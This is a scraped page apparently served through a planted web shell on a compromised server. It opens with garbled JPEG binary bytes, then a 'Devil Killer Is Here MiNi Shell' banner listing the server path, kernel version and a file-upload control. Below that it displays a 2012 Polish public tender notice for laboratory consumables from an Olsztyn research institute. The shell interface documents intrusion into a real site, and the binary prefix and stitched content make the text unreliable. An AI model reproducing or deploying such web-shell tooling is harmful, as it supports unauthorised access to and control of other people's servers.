JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120619/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120619/209960-N-2012.html

<p class="kh_header"><b>Olsztyn: Dostawa akcesoriów laboratoryjnych i zużywalnych materiałów do prac naukowo-badawczych IV</b><br>
<b>Numer ogłoszenia: 209960 - 2012; data zamieszczenia: 19.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Rozrodu Zwierząt i Badań Żywności Polskiej Akademii Nauk , ul. Tuwima 10, 10-747 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5234692, faks 089 5234693.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pan.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka naukowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa akcesoriów laboratoryjnych i zużywalnych materiałów do prac naukowo-badawczych IV.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa do Zamawiającego akcesoriów laboratoryjnych i zużywalnych materiałów do prac naukowo-badawczych IV.
2.	Zamówienie zostało podzielone na 36 Części, szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ. Każdy Wykonawca może złożyć jedną ofertę na więcej niż jedną Część.
Część 1 - Kanistry, statywy
Część 2 - Probówki Falcon i Eppendorf
Część 3 -Probówki do PCR
Część 4 - Płytki nunc
Część 5 - Mieszadełka
Część 6 - Szkło i porcelana laboratoryjna
Część 7 - Pojemniki na odpady, pudełka
Część 8 - Bibuła
Część 9 -  Naczynia na odczynniki
Część 10 - Końcówki Omnitip
Część 11 - Końcówki UNITIPS
Część 12 - Końcówki BIOHIT
Część 13 - Końcówki BRAND
Część 14 - Końcówki LTS
Część 15 - Końcówki Eppendorf
Część 16 - Końcówki Axygen
Część 17 - Końcówki Gilson
Część 18 - Końcówki uniwersalne
Część 19 - Pipety serologiczne
Część 20 - Szkiełka mikroskopowe
Część 21 - Parafilm
Część 22 - Filtry strzykawkowe
Część 23 - Drobny sprzęt
Część 24 - Szczotki laboratoryjne
Część 25 - Płytki titracyjne
Część 26 - Płytki mikrotitracyjne
Część 27 - Goblety i słomki
Część 28 - Homogenizatory
Część 29 - Rękawy papierowe
Część 30 - Szalki
Część 31 - Materiały zużywalne do urządzeń laboratoryjnych
Część 32 - Woreczki strunowe
Część 33 - Sitka do przesiewania hodowli komórkowych i płytki
Część 34 - Płytki Corning
Część 35 - TissueRuptor
Część 36 - Płytki do PCR

3.	Oferowane zużywalne materiały laboratoryjne muszą spełniać wymagania w zakresie wymiarów, rodzaju materiału, dodatkowych parametrów opisanych w załączniku nr 1 do SIWZ. Oferowane materiały laboratoryjne muszą być dopuszczone do obrotu na terenie RP lub UE.
4.	Przez ofertę równoważną należy rozumieć ofertę o parametrach technicznych nie gorszych niż określone w załączniku nr 1 do SIWZ. Do oferty należy dołączyć karty katalogowe, materiały, specyfikacje techniczne,  broszury, foldery lub instrukcja obsługi producenta potwierdzające, że oferowane produkty odpowiadają wymaganiom określonym przez Zamawiającego.  Dostarczone materiały muszą potwierdzać parametry określone w specyfikacji - załącznik nr 1 do SIWZ.
5.	W przypadku Części: 3, 12, 14, 16 ze względu na zapewnienie powtarzalności wyników w prowadzonych badaniach naukowych Zamawiający w opisie przedmiotu zamówienia tj. probówki do PCR i końcówki do pipet, wskazał oprócz opisu, także producenta oraz numery katalogowe. Wskazanie producenta, numerów katalogowych nie wskazuje bezpośrednio na Wykonawcę sukcesywnej dostawy. Ofertę może złożyć każdy Wykonawca zainteresowany uzyskaniem i realizacją zamówienia. W Części 28 wskazano konkretnego rodzaju homogenizatory, które już są użytkowane w prowadzonym badaniu. Zakup tego samego rodzaju homogenizatory umożliwi zamienność i jednoczesność ich użytkowania. 
6.	Zamawiający, zgodnie z art. 29 ust. 3 ustawy Prawo zamówień publicznych, dopuszcza możliwość ofert równoważnych o parametrach i właściwościach nie gorszych niż wyspecyfikowane przez Zamawiającego. W powyższym przypadku Wykonawca zobowiązany jest do:
a)	załączenia wraz z ofertą materiałów producenta zawierających podstawowe dane oraz wymagania fizyczne;chemiczne dotyczące oferowanych końcówek i probówek;
b) wykazania poprzez dostarczenie próbek do testów, że oferowane końcówki spełniają wymagania określone przez Zamawiającego i są tożsame pod względem granicznych parametrów;
d) wykazania poprzez dostarczenie próbek do testów, że zaoferowane przez niego końcówki i probówki spełniają wymagania pozwalające na kontynuację badań naukowych prowadzonych przez Zamawiającego, bez konieczności wykonywania dodatkowych czynności (procedur), w tym np. kalibracji;
e) wykazania poprzez dostarczenie próbek do testów, że użycie zaoferowanych końcówek i probówek o parametrach/właściwościach równoważnych, nie wiąże się z koniecznością nabycia dodatkowych i/lub innych materiałów zużywalnych.
7.	Ocena spełniania równoważności zostanie dokonana na podstawie załączonych przez Wykonawcę dokumentów i próbek, wskazanych  w pkt. II.1.3) 4 a-d. Nie wykazanie spełniania równoważności spowoduje odrzucenie oferty Wykonawcy z postępowania na mocy art. 89 ust. 1 pkt 2 ustawy Prawo zamówień publicznych, po wyczerpaniu czynności wezwania do uzupełnienia dokumentów, jako nie odpowiadających treści SIWZ.
8.	Jednocześnie Zamawiający informuje, że:
a.	dołączona do oferty próbka musi zawierać minimum 20 sztuk oferowanych końcówek do pipet, 20 szt. próbówek do PCR (do przeprowadzenia testu;analizy);
b.	końcówki do pipet i probówki muszą być dostarczone w zbiorczym opakowaniu (osobna koperta lub inne opakowanie, poza złożona ofertą), z podaniem nazwy i adresu Wykonawcy, nazwy i znaku sprawy postępowania, z dopiskiem - próbki do testów potwierdzających równoważność;
c.	każde opakowanie musi być opisane w sposób umożliwiający jego identyfikację z nr Części, nr poz. wyspecyfikowanego produktu zgodnie z numerami w załączniku nr 1 i 3, nazwą oferowanego produktu zgodnie z załącznikiem nr 3.
9.	Testy;analizy dostarczonych końcówek i probówek będą przeprowadzone w okresie badania ofert, zgodnym z terminem związania ofertą, wykonane przez pracowników naukowych, dla których dany produkt jest zamawiany. Na dostarczonych końcówkach i probówkach zostanie przeprowadzone badanie prowadzone równolegle z badaniem na końcówkach i probówkach zgodnych z podanym nr katalogowym (równoległe nastawienie i odczyt 20 przygotowanych próbek z użyciem testowanych i wzorcowych końcówek) Zamawiający dopuści zaoferowane końcówki i probówki, których wyniki w przeprowadzonych testach/analizach nie będą wskazywały większych różnic niż 5% (w zakresie powtarzalności otrzymywanych wyników, wartości badanego szeregu prób wyższych lub niższych od wzorca). Wyniki przeprowadzonych testów;analiz z poszczególnych Części, będą przesłane mailem i w wersji papierowej do Zamawiających, którzy złożyli oferty na daną Część. 
10.	Powyżej opisana ocena równoważności będzie przeprowadzona na zasadzie 0 - 1 (spełnia;nie spełnia).
11.	Wykonawca dostarcza próbki końcówek do testów;analiz na własny koszt. Wszystkie próbki po przeprowadzeniu badania równoważności pozostają w załączeniu dokumentacji przetargowej.
12.	Termin udzielonej gwarancji na materiały laboratoryjne nie może być krótszy niż 12 miesięcy lub standardowej gwarancji producenta od dnia jego dostawy - Wykonawca wpisuje odpowiednio do formularza ofertowego. 
13.	Dostawa sukcesywna, termin wykonania: do 30 listopada 2012 r. od dnia podpisania umowy. Termin dostawy cząstkowej: do 14 dni od daty wysłania zamówienia lub 21 dni od daty wysłania zamówienia w przypadku towarów sprowadzanych od zagranicznego producenta - Wykonawca wpisuje odpowiednio do Formularza ofertowego i w przypadku wyboru 21 dni na dostawę cząstkową podpisuje oświadczenie. Wielkość każdej dostawy będzie każdorazowo wyspecyfikowana i przekazywana do Wykonawcy telefonicznie, mailowo lub faksem, ze wskazaniem adresu, zakładu i osoby, do której należy dostarczyć odczynniki. Zamówienia cząstkowe będą składane 2 - 4 razy w miesiącu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5, 33.19.25.00-7, 33.14.10.00-0, 38.00.00.00-5, 38.43.71.10-1, 38.43.71.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 36.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie ustanawia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane złożenie oświadczenia - Załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane złożenie oświadczenia - Załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane złożenie oświadczenia - Załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane złożenie oświadczenia - Załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane złożenie oświadczenia - Załącznik nr 4 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- Atesty i świadectwa dopuszczenia do obrotu na terytorium Rzeczpospolitej Polskiej (jeżeli dotyczą) -  posiadać aktualny certyfikat ISO, CE; deklaracje zgodności (do produktów, które tego wymagają).</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) formularze: specyfikacji - załącznik nr 1, oferty - załączniki nr 2, cenowy - załącznik nr 3 do SIWZ,
b) wypełnione załączniki nr 4, 5 do SIWZ
c) materiały producenta potwierdzające spełnienie wymaganych parametrów technicznych tj. broszura, folder, instrukcja obsługi itp. Dostarczone materiały muszą potwierdzać parametry określone w specyfikacji - załącznik nr 1 do SIWZ. Przy oferowaniu końcówek zgodnych z numerem katalogowym w specyfikacji nie jest wymagane załączanie materiałów producenta.
d) pełnomocnictwo do reprezentowania wykonawcy, o ile ofertę składa pełnomocnik.
e) umowa spółki cywilnej - jeżeli dotyczy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza możliwość zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, obejmujących:
1)	dla zmiany terminu realizacji przedmiotu zamówienia:
-ze względu na wystąpienie okoliczności niedających się przewidzieć przed zawarciem umowy, np. działanie siły wyższej;
2)	dla zmiany sposobu spełnienia świadczenia:
a)	zmiany technologiczne, w szczególności:
-przypadku braku produktu na rynku z przyczyn niezależnych od wykonawcy (np. wycofanie z rynku, zaprzestanie produkcji) istnieje możliwość zastąpienia produktem o tym samym zastosowaniu, produktu równoważnego, ale po cenie nie wyższej niż w umowie lub wypowiedzenia umowy w zakresie spornego produktu za porozumieniem stron, bez konieczności ponoszenia kary przez żadną ze stron umowy. Sprawdzenie równoważności produktu będzie przeprowadzone wg identycznych zasad jak na etapie wyboru oferty tj. opisanych w pkt. II.I.3)
-zmiany zakresu przedmiotu zamówienia spowodowane: niedostępnością na rynku produktu;materiału wskazanego w ofercie, wynikającą z zaprzestania produkcji lub wycofania z rynku produktu;materiału;
-zmianę umowy w zakresie zmiany numeru katalogowego, nazwy handlowej lub objętości opakowania, które wynikną w  okresie realizacji umowy i nie były możliwe do przewidzenia przez żadną ze strony umowy oraz o ile zmiana taka nie spowoduje zmiany ceny towaru (w przeliczeniu do nowej objętości lub gramatury towaru).

b)	zmiany w oferowanym asortymencie:
-zamiana ilości poszczególnych pozycji pakietu;części przy zachowaniu tej samej wartości umowy do 20 % wartości umownej;
2)	dla pozostałych zmian:

-zmiana sposobu dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu;grantu lub wytycznych dotyczących realizacji projektu/grantu;

3)	nie stanowi istotnej zmiany umowy w rozumieniu art. 144 Pzp, w szczególności:
a)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego, zmiana dokumentów potwierdzających uregulowanie płatności wobec podwykonawców);
b)	zmiany danych teleadresowych oraz osób wskazanych do kontaktów między stronami.

2.	Zmiany treści umowy pod rygorem nieważności wymagają zachowania formy pisemnej w postaci obustronnie podpisanego aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pan.olsztyn.pl/bip/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Rozrodu Zwierząt i Badań Żywności Polskiej Akademii Nauk ul. Bydgoska 7; 10-243 Olsztyn pokój B25.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2012 godzina 12:00, miejsce: Instytut Rozrodu Zwierząt i Badań Żywności Polskiej Akademii Nauk ul. Bydgoska 7; 10-243 Olsztyn pokój B25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Pojedyncze produkty mogą być finansowane z projektu:
Nutrition and ambient temperature during early development can reduce susceptibility to obesity realizowanego w ramach programu WELCOME Fundacji na Rzecz Nauki Polskiej, współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Działania 1.2 PO IG Wzmocnienie potencjału kadrowego nauki
Umowa nr WELCOME;2010-4;3 z dnia 14 czerwca 2011 dla IRZiBŻ PAN w Olsztynie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kanistry, statywy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Kanister przemysłowy
2	Zakrywka nakręcana do kanistrów PE-HD
3	Sterylne rynienki do medium
4	Ściereczki KIMTECH SCIENCE
5	Statywy z tworzywa PP do probówek o średnicy 16mm, 60 probówek-stanowisk
6	Statywy z tworzywa PP do probówek o średnicy 20mm, 40 probówek-stanowisk
7	Statywy z tworzywa PP do probówek o średnicy 30mm, 24 probówek-stanowisk
8	Statyw na probówki 
9	Statyw na probówki składane
10	Statyw dwustronny na mikroprobówki
11	Statyw dwustronny na mikroprobówki
12	Multi statyw 
13	Igły do strzykawek mikrolitrowych do HPLC (op=6 szt.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Probówki Falcon i Eppendorf.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Probówki o różnej pojemności, typu Falcon i Eppendorf.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.25.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Probówki do PCR.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Probówki do PCR; 0,2 ml przeźroczyste, cienkościenne, czyste, wolne  od RNase, DNase i endotoxin, z płaskim wieczkiem, wieczko z długim kołnierzem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Płytki nunc.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Płytka hodowlana, 4 dołkowa, Lab-Tek Chamber Slide, 
2	35 x 10 IVP Petridish Nontreated Vents
3	Contact Dish 60 x 15 without vents SI
4	IVF Multidish 4 well nunclon.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Mieszadełka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miszadełka magnetyczne różnej długości;pręt do wyjmowania mieszadełek i elementy mieszające-zestaw II- Rotilabo.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Szkło i porcelana laboratoryjna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zlewki szklane różnej pojemności, Eksykator szklany
Wkład do eksykatora
Zestaw do filtracji, komplet
Cylindry i kolby miarowe, lejki,
Moździerz porcelanowy szorstki, z wylewem
Tłuczek porcelanowy, 
Glaszczki PS w kształcie L
Naczynko wagowe
Naczynko wagowe
Butla dozująca, PE-HD (5 litrowa).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
